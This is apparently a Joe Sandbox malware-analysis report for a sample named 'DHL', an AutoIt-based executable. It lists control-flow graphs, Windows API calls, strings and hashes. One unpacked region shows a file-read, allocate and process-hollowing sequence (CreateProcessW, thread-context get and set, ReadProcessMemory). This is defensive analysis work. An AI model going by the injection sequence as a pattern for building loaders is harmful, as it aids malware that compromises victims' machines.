                                                        control_flow_graph 444 9a3170-9a3185 445 9a3187-9a318a 444->445 446 9a31e5-9a31e7 444->446 447 9a31eb 445->447 448 9a318c-9a3193 445->448 446->445 449 9a31e9 446->449 453 9e2dfb-9e2e23 call 9a18e2 call 9be499 447->453 454 9a31f1-9a31f6 447->454 450 9a3199-9a319e 448->450 451 9a3265-9a326d PostQuitMessage 448->451 452 9a31d0-9a31d8 DefWindowProcW 449->452 458 9e2e7c-9e2e90 call a0bf30 450->458 459 9a31a4-9a31a8 450->459 461 9a3219-9a321b 451->461 460 9a31de-9a31e4 452->460 489 9e2e28-9e2e2f 453->489 455 9a31f8-9a31fb 454->455 456 9a321d-9a3244 SetTimer RegisterWindowMessageW 454->456 462 9e2d9c-9e2d9f 455->462 463 9a3201-9a3214 KillTimer call 9a30f2 call 9a3c50 455->463 456->461 465 9a3246-9a3251 CreatePopupMenu 456->465 458->461 483 9e2e96 458->483 466 9a31ae-9a31b3 459->466 467 9e2e68-9e2e72 call a0c161 459->467 461->460 475 9e2dd7-9e2df6 MoveWindow 462->475 476 9e2da1-9e2da5 462->476 463->461 465->461 472 9e2e4d-9e2e54 466->472 473 9a31b9-9a31be 466->473 479 9e2e77 467->479 472->452 477 9e2e5a-9e2e63 call a00ad7 472->477 481 9a3253-9a3263 call 9a326f 473->481 482 9a31c4-9a31ca 473->482 475->461 484 9e2dc6-9e2dd2 SetFocus 476->484 485 9e2da7-9e2daa 476->485 477->452 479->461 481->461 482->452 482->489 483->452 484->461 485->482 490 9e2db0-9e2dc1 call 9a18e2 485->490 489->452 494 9e2e35-9e2e48 call 9a30f2 call 9a3837 489->494 490->461 494->452
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009A316A,?,?), ref: 009A31D8
                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,009A316A,?,?), ref: 009A3204
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009A3227
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009A316A,?,?), ref: 009A3232
                                                        • CreatePopupMenu.USER32 ref: 009A3246
                                                        • PostQuitMessage.USER32(00000000), ref: 009A3267
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: ba6afa38e7f51e355e5dacf66dc49c866bfe48c10b1e7b594b45b6751cc49a3b
                                                        • Instruction ID: e4e5eb7f59b32aca661275046561acd714beaf6d5eecaee3b12a49f97a557293
                                                        • Opcode Fuzzy Hash: ba6afa38e7f51e355e5dacf66dc49c866bfe48c10b1e7b594b45b6751cc49a3b
                                                        • Instruction Fuzzy Hash: 4B417831244204ABDF159BBC9D0EB793A9DEB47350F04C125FE1A9A1E1DB748E8287E1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 500 e155d8-e15686 call e13008 503 e1568d-e156b3 call e164e8 CreateFileW 500->503 506 e156b5 503->506 507 e156ba-e156ca 503->507 508 e15805-e15809 506->508 512 e156d1-e156eb VirtualAlloc 507->512 513 e156cc 507->513 510 e1584b-e1584e 508->510 511 e1580b-e1580f 508->511 514 e15851-e15858 510->514 515 e15811-e15814 511->515 516 e1581b-e1581f 511->516 517 e156f2-e15709 ReadFile 512->517 518 e156ed 512->518 513->508 519 e1585a-e15865 514->519 520 e158ad-e158c2 514->520 515->516 521 e15821-e1582b 516->521 522 e1582f-e15833 516->522 527 e15710-e15750 VirtualAlloc 517->527 528 e1570b 517->528 518->508 529 e15867 519->529 530 e15869-e15875 519->530 523 e158d2-e158da 520->523 524 e158c4-e158cf VirtualFree 520->524 521->522 525 e15843 522->525 526 e15835-e1583f 522->526 524->523 525->510 526->525 531 e15752 527->531 532 e15757-e15772 call e16738 527->532 528->508 529->520 533 e15877-e15887 530->533 534 e15889-e15895 530->534 531->508 540 e1577d-e15787 532->540 536 e158ab 533->536 537 e158a2-e158a8 534->537 538 e15897-e158a0 534->538 536->514 537->536 538->536 541 e15789-e157b8 call e16738 540->541 542 e157ba-e157ce call e16548 540->542 541->540 548 e157d0 542->548 549 e157d2-e157d6 542->549 548->508 550 e157e2-e157e6 549->550 551 e157d8-e157dc CloseHandle 549->551 552 e157f6-e157ff 550->552 553 e157e8-e157f3 VirtualFree 550->553 551->550 552->503 552->508 553->552
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E156A9
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E158CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                        • Instruction ID: a2fb4c9adebc194bc90054d5c6701fa969e8ac4a487aa478b791ad1799516385
                                                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                        • Instruction Fuzzy Hash: B1A12A75E00209EBDB14CFA4C895BEEBBB5FF88305F209569E511BB280D7759A81CF60

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 564 9a2c63-9a2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009A2C91
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009A2CB2
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,009A1CAD,?), ref: 009A2CC6
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,009A1CAD,?), ref: 009A2CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 1269cfe907b1a10e20c54e90869eacd819009d1d9680f847d790b3cbe1896d0c
                                                        • Instruction ID: 457397c8ad7a902fa2302733fe2d80db6df60af62b7ee8c253e1f89dcc60a80b
                                                        • Opcode Fuzzy Hash: 1269cfe907b1a10e20c54e90869eacd819009d1d9680f847d790b3cbe1896d0c
                                                        • Instruction Fuzzy Hash: 6FF030796403907AE770876B6C0DE773EBDD7C6F60F018059F908A6560D2610882DA70

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 679 e153b8-e154d3 call e13008 call e152a8 CreateFileW 686 e154d5 679->686 687 e154da-e154ea 679->687 688 e1558a-e1558f 686->688 690 e154f1-e1550b VirtualAlloc 687->690 691 e154ec 687->691 692 e1550d 690->692 693 e1550f-e15526 ReadFile 690->693 691->688 692->688 694 e15528 693->694 695 e1552a-e15564 call e152e8 call e142a8 693->695 694->688 700 e15580-e15588 ExitProcess 695->700 701 e15566-e1557b call e15338 695->701 700->688 701->700
                                                        APIs
                                                          • Part of subcall function 00E152A8: Sleep.KERNELBASE(000001F4), ref: 00E152B9
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E154C9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: HWQ6E6F52023
                                                        • API String ID: 2694422964-556136787
                                                        • Opcode ID: 3239c3e8ad6f9d0b94c78fe774f23a886e76ef3c448c18f7d4a068798c60df44
                                                        • Instruction ID: ca19c88e62fc712d4ba25b6de228d4f2edb985a36def83d1e40c7f544a1c380a
                                                        • Opcode Fuzzy Hash: 3239c3e8ad6f9d0b94c78fe774f23a886e76ef3c448c18f7d4a068798c60df44
                                                        • Instruction Fuzzy Hash: 96519231D14249EBEF11DBE4C815BEFBBB9AF54300F104199E609BB2C0D6B91B85CBA5

                                                        Control-flow Graph

                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A12C05
                                                        • DeleteFileW.KERNEL32(?), ref: 00A12C87
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A12C9D
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A12CAE
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A12CC0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$Copy
                                                        • String ID:
                                                        • API String ID: 3226157194-0
                                                        • Opcode ID: 245490731e12d6d8187ee7e87da50bc375fffa60026634113d308ddc60b2a333
                                                        • Instruction ID: 34f2ee802f70811a6546ac58168c40d7e143d3c516608aae7a96c9b41ec56950
                                                        • Opcode Fuzzy Hash: 245490731e12d6d8187ee7e87da50bc375fffa60026634113d308ddc60b2a333
                                                        • Instruction Fuzzy Hash: 8EB13E71E01129ABDF11DBA4CD85FDEB7BDEF49350F1040A6F609E6141EA30DA948FA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 845 9a3b1c-9a3b27 846 9a3b99-9a3b9b 845->846 847 9a3b29-9a3b2e 845->847 848 9a3b8c-9a3b8f 846->848 847->846 849 9a3b30-9a3b48 RegOpenKeyExW 847->849 849->846 850 9a3b4a-9a3b69 RegQueryValueExW 849->850 851 9a3b6b-9a3b76 850->851 852 9a3b80-9a3b8b RegCloseKey 850->852 853 9a3b78-9a3b7a 851->853 854 9a3b90-9a3b97 851->854 852->848 855 9a3b7e 853->855 854->855 855->852
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009A3B0F,SwapMouseButtons,00000004,?), ref: 009A3B40
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009A3B0F,SwapMouseButtons,00000004,?), ref: 009A3B61
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,009A3B0F,SwapMouseButtons,00000004,?), ref: 009A3B83
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 8864f51c7774e1ad371ef238bb6548389b706f097d42b0b1e2ed9b9544731a92
                                                        • Instruction ID: e9d17e9d44af956487ec9f004575fac7e2638d24004fa709819d3a3c428ac854
                                                        • Opcode Fuzzy Hash: 8864f51c7774e1ad371ef238bb6548389b706f097d42b0b1e2ed9b9544731a92
                                                        • Instruction Fuzzy Hash: BD112AB5511208FFDB20CFA5DC85ABEB7BDEF06754B108959B805E7110E3319E419BA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 856 e142a8-e14348 call e16718 * 3 863 e1434a-e14354 856->863 864 e1435f 856->864 863->864 866 e14356-e1435d 863->866 865 e14366-e1436f 864->865 867 e14376-e14a28 865->867 866->865 868 e14a3b-e14a68 CreateProcessW 867->868 869 e14a2a-e14a2e 867->869 876 e14a72 868->876 877 e14a6a-e14a6d 868->877 870 e14a30-e14a34 869->870 871 e14a74-e14aa1 869->871 873 e14a36 870->873 874 e14aad-e14ada 870->874 889 e14aa3-e14aa6 871->889 890 e14aab 871->890 878 e14ae4-e14afe Wow64GetThreadContext 873->878 874->878 898 e14adc-e14adf 874->898 876->878 880 e14e69-e14e6b 877->880 881 e14b00 878->881 882 e14b05-e14b20 ReadProcessMemory 878->882 886 e14e12-e14e16 881->886 884 e14b22 882->884 885 e14b27-e14b30 882->885 884->886 892 e14b32-e14b41 885->892 893 e14b59-e14b78 call e15d98 885->893 887 e14e67 886->887 888 e14e18-e14e1c 886->888 887->880 895 e14e31-e14e35 888->895 896 e14e1e-e14e2a 888->896 889->880 890->878 892->893 894 e14b43-e14b52 call e15ce8 892->894 905 e14b7a 893->905 906 e14b7f-e14ba2 call e15ed8 893->906 894->893 909 e14b54 894->909 900 e14e41-e14e45 895->900 901 e14e37-e14e3a 895->901 896->895 898->878 898->880 907 e14e51-e14e55 900->907 908 e14e47-e14e4a 900->908 901->900 905->886 915 e14ba4-e14bab 906->915 916 e14bec-e14c0d call e15ed8 906->916 911 e14e62-e14e65 907->911 912 e14e57-e14e5d call e15ce8 907->912 908->907 909->886 911->880 912->911 918 e14be7 915->918 919 e14bad-e14bde call e15ed8 915->919 922 e14c14-e14c32 call e16738 916->922 923 e14c0f 916->923 918->886 926 e14be0 919->926 927 e14be5 919->927 929 e14c3d-e14c47 922->929 923->886 926->886 927->916 930 e14c49-e14c7b call e16738 929->930 931 e14c7d-e14c81 929->931 930->929 933 e14c87-e14c97 931->933 934 e14d6c-e14d89 call e158e8 931->934 933->934 935 e14c9d-e14cad 933->935 942 e14d90-e14daf Wow64SetThreadContext 934->942 943 e14d8b 934->943 935->934 938 e14cb3-e14cd7 935->938 941 e14cda-e14cde 938->941 941->934 944 e14ce4-e14cf9 941->944 945 e14db1 942->945 946 e14db3-e14dbe call e15c18 942->946 943->886 948 e14d0d-e14d11 944->948 945->886 952 e14dc0 946->952 953 e14dc2-e14dc6 946->953 950 e14d13-e14d1f 948->950 951 e14d4f-e14d67 948->951 954 e14d21-e14d4b 950->954 955 e14d4d 950->955 951->941 952->886 956 e14dd2-e14dd6 953->956 957 e14dc8-e14dcb 953->957 954->955 955->948 959 e14de2-e14de6 956->959 960 e14dd8-e14ddb 956->960 957->956 961 e14df2-e14df6 959->961 962 e14de8-e14deb 959->962 960->959 963 e14e03-e14e0c 961->963 964 e14df8-e14dfe call e15ce8 961->964 962->961 963->867 963->886 964->963
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E14A63
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E14AF9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E14B1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                        • Instruction ID: b4d5f53b752ed8119cffd250815ca6d0b50b64f97c49c083f8cb39907824bf18
                                                        • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                        • Instruction Fuzzy Hash: 0B62F770A142189BEB24CBA4C850BDEB376EF58704F1091A9D11DFB3D0E77A9E81CB59
                                                        Strings
                                                        • Variable must be of type 'Object'., xrefs: 009F32B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable must be of type 'Object'.
                                                        • API String ID: 0-109567571
                                                        • Opcode ID: c8e42e5bb9ae27b8a3217fa599188d77b9ee55831bdd0ebf2838e7230e3a96d4
                                                        • Instruction ID: 331a0300a4bb6755fe97d805365815f4bdb24748fd0fd9d6133e4dd864717dfc
                                                        • Opcode Fuzzy Hash: c8e42e5bb9ae27b8a3217fa599188d77b9ee55831bdd0ebf2838e7230e3a96d4
                                                        • Instruction Fuzzy Hash: 3EC28A71A00215CFCB24CF98C890BADB7B5FF4A310F248569E916AB391D779ED81CB91
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009C0668
                                                          • Part of subcall function 009C32A4: RaiseException.KERNEL32(?,?,?,009C068A,?,00A71444,?,?,?,?,?,?,009C068A,009A1129,00A68738,009A1129), ref: 009C3304
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009C0685
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                        • String ID: Unknown exception
                                                        • API String ID: 3476068407-410509341
                                                        • Opcode ID: ec436c6d703f0a9f99c19ff7c3ef23e2b370977c34bf9e93fe5241ca2135e52b
                                                        • Instruction ID: 5cc927982dbe70196bddd1dc27ae874ba6a14970a48c421ff5af7b4f7fd6a021
                                                        • Opcode Fuzzy Hash: ec436c6d703f0a9f99c19ff7c3ef23e2b370977c34bf9e93fe5241ca2135e52b
                                                        • Instruction Fuzzy Hash: 99F0C234D0020DB78F00BA64DD5AF9E7B6C6EC0350F608A39B828D65D1EF71DB25C682
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A1302F
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A13044
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: e0592fa4fb369c7ae4e24f19816a86f612fe5cea97caf2db92614aadec32aaed
                                                        • Instruction ID: e7ef5431b158bfc16800b7f597d1234095d056dc00dd32d01e31b57137e0604c
                                                        • Opcode Fuzzy Hash: e0592fa4fb369c7ae4e24f19816a86f612fe5cea97caf2db92614aadec32aaed
                                                        • Instruction Fuzzy Hash: 33D05E7250032877DA20E7E4AC0EFCB3A7CDB04760F0006A1BA55E2091DAB09985CBD0
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A282F5
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00A282FC
                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A284DD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                        • String ID:
                                                        • API String ID: 146820519-0
                                                        • Opcode ID: 67e080cbccaccc87a03595e43ce453b520a513f08095fe7aa39e23fe6bacab78
                                                        • Instruction ID: bebb73f8989dafc74bb93d7f35b713c097f8a86134f88faa8de5d7b08f2d60fb
                                                        • Opcode Fuzzy Hash: 67e080cbccaccc87a03595e43ce453b520a513f08095fe7aa39e23fe6bacab78
                                                        • Instruction Fuzzy Hash: 14128C719083119FC714DF28D580B6ABBE1BF89328F04896DF8998B252DB35ED45CF92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1794a22d4c34211ad4a6cb70cd6d77c14505ce807369ebcfbb7de11af3fb983
                                                        • Instruction ID: 1427ba6246dbbddf707b4ce4b2b50e4be6a494207ee4bc1795e587d27d8e42da
                                                        • Opcode Fuzzy Hash: e1794a22d4c34211ad4a6cb70cd6d77c14505ce807369ebcfbb7de11af3fb983
                                                        • Instruction Fuzzy Hash: 9251E071D90609AFDB20AFB8C845FAEBBB8AF45310F16801BF404B7391D7799901DB62
                                                        APIs
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A1BF4
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 009A1BFC
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A1C07
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A1C12
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 009A1C1A
                                                          • Part of subcall function 009A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 009A1C22
                                                          • Part of subcall function 009A1B4A: RegisterWindowMessageW.USER32(00000004,?,009A12C4), ref: 009A1BA2
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009A136A
                                                        • OleInitialize.OLE32 ref: 009A1388
                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 009E24AB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: 85a14c9f93b6a43556ed521c7101ad68a0639629a2fd8df089d7ed08444f8e34
                                                        • Instruction ID: e61fe78846aa1784e3a114684a58c9fe2989431b6e930d12d67fdc21fe656390
                                                        • Opcode Fuzzy Hash: 85a14c9f93b6a43556ed521c7101ad68a0639629a2fd8df089d7ed08444f8e34
                                                        • Instruction Fuzzy Hash: 8F71ABB49212008FC388EFFDAD56A563BE5FB89354B54C22AE00ED7361EB304482CF95
                                                        APIs
                                                          • Part of subcall function 009A3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009A3A04
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A0C259
